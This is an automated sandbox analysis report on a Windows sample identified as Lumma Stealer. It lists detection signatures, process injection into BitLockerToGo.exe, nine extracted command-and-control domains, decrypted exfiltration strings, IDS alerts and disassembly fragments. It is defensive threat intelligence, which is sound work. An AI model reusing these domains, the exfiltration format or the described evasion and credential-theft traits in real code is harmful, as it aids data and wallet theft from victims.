Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NjFiIQNSid.exe

Overview

General Information

Sample name:NjFiIQNSid.exe
renamed because original name is a hash value
Original sample name:49615905016fb4de6a3b50d12979b1076eca6bc539d9bcbf2ed338b6b2299cc7.exe
Analysis ID:1585134
MD5:29ca15934b67b18a91254ce253a588ca
SHA1:05dfc5bb1df62ca212e1c8adf5af4542f7ad8b78
SHA256:49615905016fb4de6a3b50d12979b1076eca6bc539d9bcbf2ed338b6b2299cc7
Tags:exeuser-zhuzhu0009
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • NjFiIQNSid.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\NjFiIQNSid.exe" MD5: 29CA15934B67B18A91254CE253A588CA)
    • BitLockerToGo.exe (PID: 6484 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["tirepublicerj.shop", "cloudewahsj.shop", "wholersorie.shop", "abruptyopsn.shop", "framekgirus.shop", "noisycuttej.shop", "rabidcowse.shop", "bootstringjl.click", "nearycrepso.shop"], "Build id": "HpOoIh--2a727a032c4d"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000003.2820648610.000000000319D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: BitLockerToGo.exe PID: 6484JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: BitLockerToGo.exe PID: 6484JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: BitLockerToGo.exe PID: 6484JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:53.949040+010020283713Unknown Traffic192.168.2.1249714104.102.49.254443TCP
                2025-01-07T06:01:55.095658+010020283713Unknown Traffic192.168.2.1249715104.21.112.1443TCP
                2025-01-07T06:01:56.178686+010020283713Unknown Traffic192.168.2.1249716104.21.112.1443TCP
                2025-01-07T06:01:57.515055+010020283713Unknown Traffic192.168.2.1249717104.21.112.1443TCP
                2025-01-07T06:01:58.799997+010020283713Unknown Traffic192.168.2.1249718104.21.112.1443TCP
                2025-01-07T06:02:00.041788+010020283713Unknown Traffic192.168.2.1249719104.21.112.1443TCP
                2025-01-07T06:02:02.028689+010020283713Unknown Traffic192.168.2.1249720104.21.112.1443TCP
                2025-01-07T06:02:03.345579+010020283713Unknown Traffic192.168.2.1249721104.21.112.1443TCP
                2025-01-07T06:02:04.676158+010020283713Unknown Traffic192.168.2.1249722104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:55.679027+010020546531A Network Trojan was detected192.168.2.1249715104.21.112.1443TCP
                2025-01-07T06:01:56.656307+010020546531A Network Trojan was detected192.168.2.1249716104.21.112.1443TCP
                2025-01-07T06:02:05.172574+010020546531A Network Trojan was detected192.168.2.1249722104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:55.679027+010020498361A Network Trojan was detected192.168.2.1249715104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:56.656307+010020498121A Network Trojan was detected192.168.2.1249716104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:53.201766+010020585981Domain Observed Used for C2 Detected192.168.2.12611641.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:53.268439+010020586061Domain Observed Used for C2 Detected192.168.2.12553051.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:53.224916+010020586101Domain Observed Used for C2 Detected192.168.2.12594911.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:53.190389+010020586161Domain Observed Used for C2 Detected192.168.2.12539871.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:53.245728+010020586181Domain Observed Used for C2 Detected192.168.2.12523441.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:53.257267+010020586221Domain Observed Used for C2 Detected192.168.2.12503811.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:53.235108+010020586281Domain Observed Used for C2 Detected192.168.2.12608431.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:53.213434+010020586321Domain Observed Used for C2 Detected192.168.2.12603821.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:02:04.152149+010020480941Malware Command and Control Activity Detected192.168.2.1249721104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T06:01:54.486321+010028586661Domain Observed Used for C2 Detected192.168.2.1249714104.102.49.254443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: NjFiIQNSid.exeAvira: detected
                Found malware configuration
                Source: 4.2.BitLockerToGo.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "cloudewahsj.shop", "wholersorie.shop", "abruptyopsn.shop", "framekgirus.shop", "noisycuttej.shop", "rabidcowse.shop", "bootstringjl.click", "nearycrepso.shop"], "Build id": "HpOoIh--2a727a032c4d"}
                Multi AV Scanner detection for submitted file
                Source: NjFiIQNSid.exeVirustotal: Detection: 45%Perma Link
                Source: NjFiIQNSid.exeReversingLabs: Detection: 36%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: NjFiIQNSid.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: framekgirus.shop
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wholersorie.shop
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bootstringjl.click
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: HpOoIh--2a727a032c4d
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00419362 CryptUnprotectData,4_2_00419362
                Source: NjFiIQNSid.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.12:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.12:49722 version: TLS 1.2
                Source: NjFiIQNSid.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h]4_2_00426000
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh]4_2_0040C22D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], ecx4_2_00419362
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h4_2_0043FB80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+2397B827h]4_2_0043DCE9
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h4_2_0043DCE9
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah4_2_00440480
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, edx4_2_00408640
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042BE8A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]4_2_0042BE8A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h4_2_0042A050
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+129161F8h]4_2_0043E051
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax-01h]4_2_0043E850
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx4_2_0043D818
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h4_2_00419820
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h4_2_00419820
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]4_2_0043F830
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]4_2_0043F0CB
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], dl4_2_0042C0CD
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]4_2_00415882
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h4_2_00415882
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h4_2_004398A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh4_2_004390A0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], dl4_2_0042C140
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], 9EB5184Bh4_2_00416148
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+68h]4_2_00416148
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], al4_2_00416148
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], al4_2_00416148
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi], cx4_2_0042895A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax4_2_0042895A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, word ptr [eax]4_2_00424974
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h4_2_00424974
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00428100
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h4_2_00440130
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx4_2_004229CD
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx4_2_004229CD
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h4_2_0043E19A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], dl4_2_0042C1A3
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]4_2_0043C1B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]4_2_0043F1B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00427A5A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi], ax4_2_0041CA60
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi], ax4_2_0041CA60
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-19559D57h]4_2_0043E262
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]4_2_00423A60
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042C26C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]4_2_0042C26C
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], al4_2_0042BA79
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]4_2_0043F2F6
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042C282
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]4_2_0042C282
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-22E2F54Ah]4_2_0043EA80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_00429A90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00426340
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h]4_2_00426340
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]4_2_00402B60
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]4_2_00426360
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00426360
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00427B08
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]4_2_0043F330
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]4_2_004073C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]4_2_004073C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]4_2_0043F3C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx-5Fh]4_2_0041C3CC
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi4_2_00420BD3
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then test eax, eax4_2_004393D0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], dl4_2_0042238D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx4_2_0042238D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, eax4_2_0043C440
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]4_2_0043F450
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-4Bh]4_2_00439C70
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_00435410
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]4_2_00421C80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]4_2_00416C90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h4_2_004274A5
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]4_2_00427CB0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00427CB0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, ecx4_2_0043C510
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then test eax, eax4_2_0043C510
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h4_2_0043C510
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]4_2_00414DC0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]4_2_00416C90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]4_2_004155DB
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax4_2_0041AD80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h4_2_0043FE20
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ecx], bp4_2_0041CECA
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx]4_2_0043E6E0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h]4_2_0040C6F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], bl4_2_00408EF0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebp+00h], al4_2_0041DE90
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ebx], cx4_2_00418740
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi], dx4_2_00414777
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], al4_2_0041BFCA
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]4_2_004237D0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5F376B7Fh]4_2_00417FE1
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+000002E8h]4_2_00417FE1
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], al4_2_00416F8D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, ecx4_2_00416F8D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [esi], cx4_2_00416F8D
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]4_2_00424F91
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h4_2_00424F91
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax]4_2_0043DFB3

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058632 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop) : 192.168.2.12:60382 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058628 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) : 192.168.2.12:60843 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058618 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop) : 192.168.2.12:52344 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058616 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) : 192.168.2.12:53987 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058598 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) : 192.168.2.12:61164 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058622 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop) : 192.168.2.12:50381 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.12:55305 -> 1.1.1.1:53
